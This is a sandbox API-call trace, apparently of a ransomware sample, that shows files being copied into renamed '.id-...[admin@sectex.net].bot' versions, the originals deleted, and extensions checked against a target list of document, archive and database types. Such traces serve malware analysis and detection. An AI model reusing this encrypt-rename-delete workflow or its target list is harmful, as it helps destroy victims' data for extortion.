	[0033.249] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.249] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0033.249] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.249] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.250] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.250] GetLastError () returned 0x0
	[0033.250] ReadFile (in: hFile=0x188, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x10000, lpOverlapped=0x0) returned 1
	[0033.351] WriteFile (in: hFile=0x18c, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x10010, lpOverlapped=0x0) returned 1
	[0033.353] ReadFile (in: hFile=0x188, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.353] WriteFile (in: hFile=0x18c, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0033.353] SetEndOfFile (hFile=0x18c) returned 1
	[0033.353] CloseHandle (hObject=0x18c) returned 1
	[0033.354] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.354] SetEndOfFile (hFile=0x188) returned 1
	[0033.356] CloseHandle (hObject=0x188) returned 1
	[0033.356] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x26) returned 1
	[0033.356] DeleteFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1
	[0033.356] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.356] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.356] lstrlenW (lpString=".doc") returned 4
	[0033.356] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1
	[0033.356] lstrlenW (lpString=".docx") returned 5
	[0033.356] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1
	[0033.356] lstrlenW (lpString=".pdf") returned 4
	[0033.356] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1
	[0033.356] lstrlenW (lpString=".xls") returned 4
	[0033.356] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1
	[0033.356] lstrlenW (lpString=".xlsx") returned 5
	[0033.356] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1
	[0033.356] lstrlenW (lpString=".ppt") returned 4
	[0033.356] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1
	[0033.357] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.357] lstrlenW (lpString=".zip") returned 4
	[0033.357] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1
	[0033.357] lstrlenW (lpString=".rar") returned 4
	[0033.357] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1
	[0033.357] lstrlenW (lpString=".bz2") returned 4
	[0033.357] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1
	[0033.357] lstrlenW (lpString=".7z") returned 3
	[0033.357] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1
	[0033.357] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.357] lstrlenW (lpString=".dbf") returned 4
	[0033.357] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1
	[0033.357] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.357] lstrlenW (lpString=".1cd") returned 4
	[0033.357] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1
	[0033.357] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.357] lstrlenW (lpString=".jpg") returned 4
	[0033.357] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1
	[0033.357] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.357] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.357] lstrlenW (lpString=".doc") returned 4
	[0033.357] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1
	[0033.357] lstrlenW (lpString=".docx") returned 5
	[0033.357] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1
	[0033.357] lstrlenW (lpString=".pdf") returned 4
	[0033.357] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1
	[0033.357] lstrlenW (lpString=".xls") returned 4
	[0033.357] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1
	[0033.357] lstrlenW (lpString=".xlsx") returned 5
	[0033.357] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1
	[0033.357] lstrlenW (lpString=".ppt") returned 4
	[0033.357] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1
	[0033.357] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.357] lstrlenW (lpString=".zip") returned 4
	[0033.358] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1
	[0033.358] lstrlenW (lpString=".rar") returned 4
	[0033.358] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1
	[0033.358] lstrlenW (lpString=".bz2") returned 4
	[0033.358] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1
	[0033.358] lstrlenW (lpString=".7z") returned 3
	[0033.358] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1
	[0033.358] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.358] lstrlenW (lpString=".dbf") returned 4
	[0033.358] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1
	[0033.358] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.358] lstrlenW (lpString=".1cd") returned 4
	[0033.358] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1
	[0033.358] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20
	[0033.358] lstrlenW (lpString=".jpg") returned 4
	[0033.358] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1
	[0033.358] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.358] lstrlenW (lpString="Setup.xml") returned 9
	[0033.358] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.640] GetFileSizeEx (in: hFile=0x190, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=2296) returned 1
	[0033.640] CloseHandle (hObject=0x190) returned 1
	[0033.641] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0033.641] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.641] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.641] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.641] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.641] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0035.224] GetLastError () returned 0x0
	[0035.224] ReadFile (in: hFile=0x190, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x8f8, lpOverlapped=0x0) returned 1
	[0035.346] WriteFile (in: hFile=0x194, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x900, lpOverlapped=0x0) returned 1
	[0035.347] ReadFile (in: hFile=0x190, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.347] WriteFile (in: hFile=0x194, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0035.347] SetEndOfFile (hFile=0x194) returned 1
	[0035.348] CloseHandle (hObject=0x194) returned 1
	[0035.348] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.348] SetEndOfFile (hFile=0x190) returned 1
	[0035.349] CloseHandle (hObject=0x190) returned 1
	[0035.349] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.350] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0035.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.350] lstrlenW (lpString=".doc") returned 4
	[0035.350] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.350] lstrlenW (lpString=".docx") returned 5
	[0035.350] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0035.350] lstrlenW (lpString=".pdf") returned 4
	[0035.350] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.350] lstrlenW (lpString=".xls") returned 4
	[0035.350] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.350] lstrlenW (lpString=".xlsx") returned 5
	[0035.350] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0035.350] lstrlenW (lpString=".ppt") returned 4
	[0035.350] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.350] lstrlenW (lpString=".zip") returned 4
	[0035.350] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.350] lstrlenW (lpString=".rar") returned 4
	[0035.350] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.350] lstrlenW (lpString=".bz2") returned 4
	[0035.350] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.350] lstrlenW (lpString=".7z") returned 3
	[0035.350] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.350] lstrlenW (lpString=".dbf") returned 4
	[0035.350] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.351] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.351] lstrlenW (lpString=".1cd") returned 4
	[0035.351] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.351] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.351] lstrlenW (lpString=".jpg") returned 4
	[0035.351] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.351] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.351] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.351] lstrlenW (lpString=".doc") returned 4
	[0035.351] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.351] lstrlenW (lpString=".docx") returned 5
	[0035.351] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0035.351] lstrlenW (lpString=".pdf") returned 4
	[0035.351] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.351] lstrlenW (lpString=".xls") returned 4
	[0035.351] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.351] lstrlenW (lpString=".xlsx") returned 5
	[0035.351] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0035.351] lstrlenW (lpString=".ppt") returned 4
	[0035.351] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.351] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.351] lstrlenW (lpString=".zip") returned 4
	[0035.351] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.351] lstrlenW (lpString=".rar") returned 4
	[0035.351] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.351] lstrlenW (lpString=".bz2") returned 4
	[0035.351] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.351] lstrlenW (lpString=".7z") returned 3
	[0035.351] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.351] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.351] lstrlenW (lpString=".dbf") returned 4
	[0035.351] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.351] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.351] lstrlenW (lpString=".1cd") returned 4
	[0035.352] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.352] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.352] lstrlenW (lpString=".jpg") returned 4
	[0035.352] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.352] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.352] lstrlenW (lpString="Office32WW.xml") returned 14
	[0035.352] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0035.550] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=4274) returned 1
	[0035.550] CloseHandle (hObject=0x1a0) returned 1
	[0035.550] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020
	[0035.550] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.550] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0035.550] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.550] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.550] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0035.551] GetLastError () returned 0x0
	[0035.551] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x10b2, lpOverlapped=0x0) returned 1
	[0035.552] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x10c0, lpOverlapped=0x0) returned 1
	[0035.553] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.553] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0035.553] SetEndOfFile (hFile=0x1b0) returned 1
	[0035.553] CloseHandle (hObject=0x1b0) returned 1
	[0035.554] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.554] SetEndOfFile (hFile=0x1a0) returned 1
	[0035.555] CloseHandle (hObject=0x1a0) returned 1
	[0035.555] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.555] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1
	[0035.555] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.555] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.555] lstrlenW (lpString=".doc") returned 4
	[0035.555] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.555] lstrlenW (lpString=".docx") returned 5
	[0035.555] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.555] lstrlenW (lpString=".pdf") returned 4
	[0035.556] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.556] lstrlenW (lpString=".xls") returned 4
	[0035.556] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.556] lstrlenW (lpString=".xlsx") returned 5
	[0035.556] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.556] lstrlenW (lpString=".ppt") returned 4
	[0035.556] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.556] lstrlenW (lpString=".zip") returned 4
	[0035.556] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.556] lstrlenW (lpString=".rar") returned 4
	[0035.556] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.556] lstrlenW (lpString=".bz2") returned 4
	[0035.556] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.556] lstrlenW (lpString=".7z") returned 3
	[0035.556] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.556] lstrlenW (lpString=".dbf") returned 4
	[0035.556] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.556] lstrlenW (lpString=".1cd") returned 4
	[0035.556] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.556] lstrlenW (lpString=".jpg") returned 4
	[0035.556] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.556] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.556] lstrlenW (lpString=".doc") returned 4
	[0035.556] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.556] lstrlenW (lpString=".docx") returned 5
	[0035.556] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.556] lstrlenW (lpString=".pdf") returned 4
	[0035.556] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.556] lstrlenW (lpString=".xls") returned 4
	[0035.557] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.557] lstrlenW (lpString=".xlsx") returned 5
	[0035.557] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.557] lstrlenW (lpString=".ppt") returned 4
	[0035.557] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.557] lstrlenW (lpString=".zip") returned 4
	[0035.557] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.557] lstrlenW (lpString=".rar") returned 4
	[0035.557] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.557] lstrlenW (lpString=".bz2") returned 4
	[0035.557] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.557] lstrlenW (lpString=".7z") returned 3
	[0035.557] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.557] lstrlenW (lpString=".dbf") returned 4
	[0035.557] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.557] lstrlenW (lpString=".1cd") returned 4
	[0035.557] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.557] lstrlenW (lpString=".jpg") returned 4
	[0035.557] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.557] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.557] lstrlenW (lpString="PrjProrWW.xml") returned 13
	[0035.557] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0035.558] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=6421) returned 1
	[0035.558] CloseHandle (hObject=0x1a0) returned 1
	[0035.558] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 0x2020
	[0035.558] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
